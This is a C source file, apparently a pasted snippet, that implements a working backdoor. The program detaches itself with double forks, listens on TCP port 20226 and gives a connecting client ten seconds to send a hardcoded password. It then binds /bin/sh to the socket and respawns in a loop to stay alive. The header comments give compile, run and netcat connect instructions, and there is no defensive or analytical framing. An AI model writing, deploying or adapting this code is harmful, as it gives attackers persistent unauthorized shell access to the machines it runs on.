Untitled

/*
** compile: `gcc backdoor.c -o target`
** exec: `./target`
** connect: `nc host port` then you have 10s for typing the password
** You can change the password and the listening port
*/

// change the password
char *password = "issou";

// change the listening port
int port = 20226;

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>

#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

char *args[] = { "/bin/sh", NULL };

void open_backdoor (char *argv[], char *envp[]) {
  int accepted;
  int sock;
  struct sockaddr_in addr;

  sock = socket(AF_INET, SOCK_STREAM, 0);

  int one = 1;
  setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));

  addr.sin_family = AF_INET;
  addr.sin_port = htons(port);
  addr.sin_addr.s_addr = INADDR_ANY;

  bind(sock, (struct sockaddr *) &addr, sizeof(addr));

  listen(sock, 0);

  while (accepted = accept(sock, NULL, NULL)) {
    if (!fork()) {
      char buffer[strlen(password)];
      // on a 10s pour entrer le password sinon on se fait tej :)
      struct timeval timeout;
      timeout.tv_sec = 10;
      timeout.tv_usec = 0;

      setsockopt(accepted, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout));

      recv(accepted, buffer, strlen(password), 0);

      if (memcmp(buffer, password, strlen(password)) != 0) {
        close(accepted);
        exit(0);
      }

      timeout.tv_sec = 0;
      timeout.tv_usec = 0;

      // on tej le timeout une fois qu'on est log
      setsockopt(accepted, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout));


      dup2(accepted, 2);
      dup2(accepted, 1);
      dup2(accepted, 0);

      execve(args[0], args, envp);
    }

    close(accepted);
  }
}

int main(int argc, char *argv[], char *envp[])
{
  int pid;
  if (fork()) return 0;
  if (fork()) return 0;

  while (1) {
    pid = fork();
    if (pid <= 0) {
      open_backdoor(args, envp);
      break;
    }

    wait(NULL);
  }

  open_backdoor(args, envp);
}